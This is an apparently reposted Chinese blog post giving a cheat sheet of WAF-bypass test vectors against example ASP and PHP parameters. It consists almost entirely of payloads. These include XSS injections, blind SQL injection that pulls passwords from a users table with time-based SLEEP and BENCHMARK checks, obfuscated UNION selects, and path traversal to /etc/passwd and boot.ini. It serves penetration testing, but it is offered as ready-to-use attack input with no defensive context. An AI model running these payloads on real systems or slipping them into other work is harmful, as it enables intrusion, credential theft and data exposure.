SQL注入和XSS bypass waf 测试向量

时间：2022-03-10 18:08

uyg.asp?id=onError="javascript:decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;

uyg.asp?id=<isindex type=image src=1 onerror=alert(1)>
uyg.asp?id=<isindex action=javascript:alert(1) type=image>
uyg.asp?id=<img src=x:alert(alt) onerror=eval(src) alt=0>
uyg.asp?id=<meta />
uyg.asp?id=<!</textarea <body onload=‘alert(1)‘>
uyg.asp?id=</ style=?=-=expression\28write(12345)\29>
uyg.asp?id=<script>document.write(1)</script>
uyg.asp?id=<img <iframe ="1" onerror="alert(1)">
uyg.asp?id=<script<{alert(1)}/></script>
uyg.asp?id=">alert(String.fromCharCode(88,83,83));
uyg.asp?id=</XSS/*-*/STYLE=xss:e/**/xpression(alert(1))>
uyg.asp?id=<//STYLE=x:e/**/xpression(alert(‘xss‘))>
uyg.asp?id=<object+data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

7. 盲注入
uyg.asp?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74--
uyg.asp?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74--
uyg.asp?id=1+and+ascii(‘a‘)=97
uyg.asp?id=1+and+hex(‘a‘)=61
uyg.asp?id=ord(‘a‘) = 97
uyg.asp?id=if(substring(USER(),1,4)=‘root‘,BENCHMARK(100000000,RAND()),1)--
uyg.asp?id=if(substring(USER(),1,4)=‘root‘,SLEEP(5),1)--
uyg.asp?id=123‘ and (select pass from users limit 1)=‘pass--

8. 其他注入
uyg.asp?id=123+AND+1=1
uyg.asp?id=123+&&+1=1
uyg.asp?id=‘=‘
uyg.asp?id=123+AND+md5(‘a‘)!= md5(‘A‘)
uyg.asp?id=123+and+len(@@version)>1
uyg.asp?id=1‘||1=‘1
uyg.asp?id=123‘+like+‘123
uyg.asp?id=123‘+not+like+‘1234
uyg.asp?id=‘aaa‘<>‘bbb‘

uyg.asp?id=123+1-1 (id=123)
uyg.asp?id=123+1 (id=124)
uyg.asp?id=123+len(1234)-len(123) (id=124)
uyg.asp?id=123+len(@@server)-len(@@server)

uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1/*union*/union/*select*/select+1,2,3/*
uyg.php?id=1%2520union%2520select%25201,2,3/*
uyg.php?id=1%0Aunion%0Aselect%0A1,2,3/*
uyg.php?id=1/**/union%a0select/**/1,pass,3`a`from`users`
uyg.php?id=(0)union(select(table_schema),table_name,(0)from(information_schema.tables)having((table_schema)like(0x74657374)&&(table_name)!=(0x7573657273)))#

uyg.php?id=union(select(version()))--

uyg.php?id=123/*! union all select version() */--
uyg.php?id=123/*!or*/1=1;

uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1+union+select+1,2,3--
uyg.php?id=1+union+select+1,2,3#
uyg.php?id=1+union+select+1,2,3;%00

uyg.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%00TESTTEST%3E
uyg.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%20TESTTEST%3E
uyg.php?id=";eval(unescape(location))//#%0Aalert(0)
uyg.php?file=../../../../../etc/passwd/////[…]/////
uyg.php?file=../../../../../etc/passwd//////////////
uyg.php?file=.//././/././/./boot.ini uyg.php?id%00TESTTEST=1+union+select+1,2,3
uyg.php?id%20TESTTEST=1+union+select+1,2,3
uyg.php?id=1234&"><script>alert(1)</script>=1234
uyg.php?id=%00><script>alert(123)</script>

9. URL重写
http://localhost/uyg/id/123+or+1=1/tp/456

SQL注入和XSS bypass waf 测试向量,布布扣,bubuko.com